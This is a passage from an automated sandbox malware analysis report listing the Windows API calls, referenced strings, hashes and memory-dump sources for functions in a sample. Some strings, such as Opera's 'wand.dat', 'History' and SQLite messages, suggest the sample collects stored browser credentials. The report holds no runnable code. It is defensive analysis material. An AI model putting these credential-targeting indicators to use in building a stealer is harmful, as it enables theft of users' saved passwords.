                                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                              • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                              • String ID: AE
                                                                                                                                                              • API String ID: 3548547718-685266089
                                                                                                                                                              • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                              • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                              • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                              • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memicmpwcslen
                                                                                                                                                              • String ID: @@@@$History
                                                                                                                                                              • API String ID: 1872909662-685208920
                                                                                                                                                              • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                              • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                              • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                              • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004100FB
                                                                                                                                                              • memset.MSVCRT ref: 00410112
                                                                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                              • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                              • String ID: </%s>
                                                                                                                                                              • API String ID: 3400436232-259020660
                                                                                                                                                              • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                              • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                              • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                              • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040E770
                                                                                                                                                              • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSendmemset
                                                                                                                                                              • String ID: AE$"
                                                                                                                                                              • API String ID: 568519121-1989281832
                                                                                                                                                              • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                              • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040D58D
                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                              • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                              • String ID: caption
                                                                                                                                                              • API String ID: 1523050162-4135340389
                                                                                                                                                              • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                              • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                              • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                              • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                              • String ID: MS Sans Serif
                                                                                                                                                              • API String ID: 210187428-168460110
                                                                                                                                                              • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                              • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                              • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                              • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassName_wcsicmpmemset
                                                                                                                                                              • String ID: edit
                                                                                                                                                              • API String ID: 2747424523-2167791130
                                                                                                                                                              • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                              • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                              • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                              • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                              • API String ID: 3150196962-1506664499
                                                                                                                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3384217055-0
                                                                                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 368790112-0
                                                                                                                                                              • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                              • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1889144086-0
                                                                                                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1661045500-0
                                                                                                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                              Strings
                                                                                                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                              • API String ID: 1297977491-2063813899
                                                                                                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                              • String ID: *.*$dat$wand.dat
                                                                                                                                                              • API String ID: 2618321458-1828844352
                                                                                                                                                              • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                              • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                              • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1549203181-0
                                                                                                                                                              • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                              • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                              • String ID:
